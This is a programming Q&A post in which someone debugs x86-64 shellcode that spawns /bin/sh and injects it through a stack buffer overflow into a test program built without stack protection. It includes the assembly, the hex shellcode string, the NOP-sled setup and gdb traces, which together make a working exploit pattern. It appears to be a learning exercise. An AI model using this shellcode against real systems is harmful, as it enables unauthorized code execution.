# ASM shell spawner works, but fails in buffer overflow implementation

Tags: assembly, x86-64, buffer-overflow, exploit, shellcode

I have my assembly code:

```
section .shellcode  progbits alloc exec write align=16
global _start
_start:
xor rdx,rdx
xor rbx,rbx
xor rax,rax
xor rsi,rsi
xor rdi,rdi
mov qword rbx,0x68732f6e69622f2f
shr rbx,0x8
push rbx
mov rdi,rsp
push rax
push rdi
mov rsi,rsp
mov al,0x3b
syscall
```

The assembly code calls execve, with "/bin/sh" as expected.

I run it like this:

```
nasm -f elf64 shellCode.asm  
ld shellCode.o -o shellCode  
./shellCode
```

A shell is successfully spawned.

I use "objdump -D ./shellCode:

```
48 31 d2                xor    %rdx,%rdx
48 31 db                xor    %rbx,%rbx
48 31 c0                xor    %rax,%rax
48 31 f6                xor    %rsi,%rsi
48 31 ff                xor    %rdi,%rdi
48 bb 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rbx
2f 73 68
48 c1 eb 08             shr    $0x8,%rbx
53                      push   %rbx
48 89 e7                mov    %rsp,%rdi
50                      push   %rax
57                      push   %rdi
48 89 e6                mov    %rsp,%rsi
b0 3b                   mov    $0x3b,%al
0f 05                   syscall
```

I turn it into shellcode for my exploit:

```
\x48\x31\xd2\x48\x31\xdb\x48\x31\xc0\x48\x31\xf6\x48\x31\xff\x48\xbb\x2f\x2f\x62\x69
\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
```

I buffer it with NOPs. I have my return address at the end.
I compile and start up the vulnerable program in gdb to verify that the shellcode is properly placed in memory and is being run:

```
gcc -g -fno-stack-protector -z execstack vuln.c -o vuln
gdb ./vuln
```

To save some space and make things simple, I will just show that the memory is filled with my shellcode, and that it is being executed:

```
(gdb) x/40x $rip
0x7fffffffe1d0: 0x90909090      0x90909090      0x48d23148      0x3148db31
0x7fffffffe1e0: 0xf63148c0      0x48ff3148      0x622f2fbb      0x732f6e69
0x7fffffffe1f0: 0xebc14868      0x89485308      0x485750e7      0x3bb0e689
0x7fffffffe200: 0x9090050f      0x90909090      0x90909090      0x90909090
```

Alas, while stepping through the instructions, I arrive at this:

```
(gdb) nexti
0x00007fffffffe1f1 in ?? ()
(gdb) i r
rax            0x0      0
rbx            0x68732f6e69622f2f       7526411553527181103
rcx            0x7ffff7b01470   140737348899952
rdx            0x0      0
rsi            0x0      0
rdi            0x0      0
rbp            0x9090909090909090       0x9090909090909090
rsp            0x7fffffffe260   0x7fffffffe260
r8             0x0      0
r9             0x77     119
r10            0x7c     124
r11            0x246    582
r12            0x400450 4195408
r13            0x7fffffffe330   140737488347952
r14            0x0      0
r15            0x0      0
rip            0x7fffffffe1f1   0x7fffffffe1f1
eflags         0x246    [ PF ZF IF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) nexti
0x00007fffffffe1f5 in ?? ()
(gdb) nexti
Warning:
Cannot insert breakpoint 0.
Cannot access memory at address 0x68732f6e69622f

0x00007fffffffe1f6 in ?? ()
```

Notice when I looked at the register contents, it is before I did "shr $0x8, rbx".
Two instructions later, means I get the error when trying to "push rbx" to the stack.

So, I have two questions.
1) Why does the assembly code work just fine when run by itself compared to when it is in the vuln programs buffer?
2) More specifically, when I am trying to push rbx (the string "/bin/sh"), why does it try to use the contents of rbx as an address to access?

Comment: Make sure the shellcode which is itself on the stack is not being overwritten by the `push`.

Comment: There are about 80 nops between the shellcode and where rsp is writing to. I double checked the memory contents before and after pushing rbx, and the rsp is not writing over the shellcode I am running. I also tried moving the rsp such that it overwrote some of that nop space instead and same result.

Comment: What exactly is your problem? Note that the warnings printed by `gdb` are just that, warnings. It is `gdb` that is trying to access the memory. They have no effect on your code, it has continued to the next instruction. That said, try using `stepi` instead of `nexti` that might get rid of the messages.

Comment: I figured it might be related to my problem, but you are right and stepi gets rid of that warning. The problem is that I do not get a shell. in gdb:  `process 853 is executing new program: /usr/bin/bash`
`[Inferior 1 (process 853) exited normally]`.
Outside of gdb I get a segfault.

Comment: I am confused, where is the segfault? The `executing new program: /usr/bin/bash` is exactly what you want, isn't it?

Comment: Sorry, see edit.

Comment: Enable core dumps and load that into `gdb`. You can also look in `/var/log/syslog`.